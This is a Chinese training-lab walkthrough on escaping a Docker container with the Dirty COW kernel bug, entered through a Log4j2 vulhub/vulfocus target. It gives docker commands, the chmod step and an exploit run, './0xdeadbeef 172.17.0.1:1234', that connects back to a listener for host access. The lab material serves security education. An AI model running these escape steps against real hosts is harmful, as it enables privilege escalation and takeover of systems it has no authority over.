Linux内核
测试环境
本次测试系统环境:Ubuntu14.04.3
本次测试内核环境:Linux 4.4.0
本次测试入口:Log4j2漏洞(vulhub靶场)
CVE-2016-5195 即 dirtyCOW ,俗称「脏牛」漏洞,是 Linux Kernel 中的条件竞争漏洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)技术中存在的逻辑漏洞完成对文件的越权读写
Copy-on-Write机制:「父进程与子进程共享所有的页框」当任意一方尝试修改某个页框时,COW会启动复制需要修改的页框。
漏洞范围:Linux内核 >= 2.6.22(到2016年10月18日才修复)
docker pull vulfocus/log4j2-rce-2021-12-09:latest
2.部署log4j2靶场
docker run -d -p 80:8080 vulfocus/log4j2-rce-2021-12-09:latest
3.利用log4j2的exp打进去
如何利用log4j2漏洞可以看训练营的前几期
4.判断下bash是否为docker
5.下载编译好的脏牛exp,和一些必须的组件wget、zip、net-tools
6.给脏牛添加权限chmod 777
7.查询目前IP,根据目前IP启动脏牛
./0xdeadbeef 172.17.0.1:1234
容器逃逸已经完成,宿主机权限已经获取这是宿主机的内容
此时我们尝试写入一个文件给宿主机
正常使用ssh连接宿主机进行查看
【“脏牛”漏洞CVE-2016-5195复现及简要分析】https://blog.csdn.net/arttnba3/article/details/115773316
【脏牛漏洞影响的linux内核,DirtyCow】https://blog.csdn.net/weixin_30276247/article/details/116640236
地址|北京市海淀区奥北科技园20号楼5层
原文始发于微信公众号(大学生网络安全尖锋训练营):【学习园地】脏牛容器逃逸复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论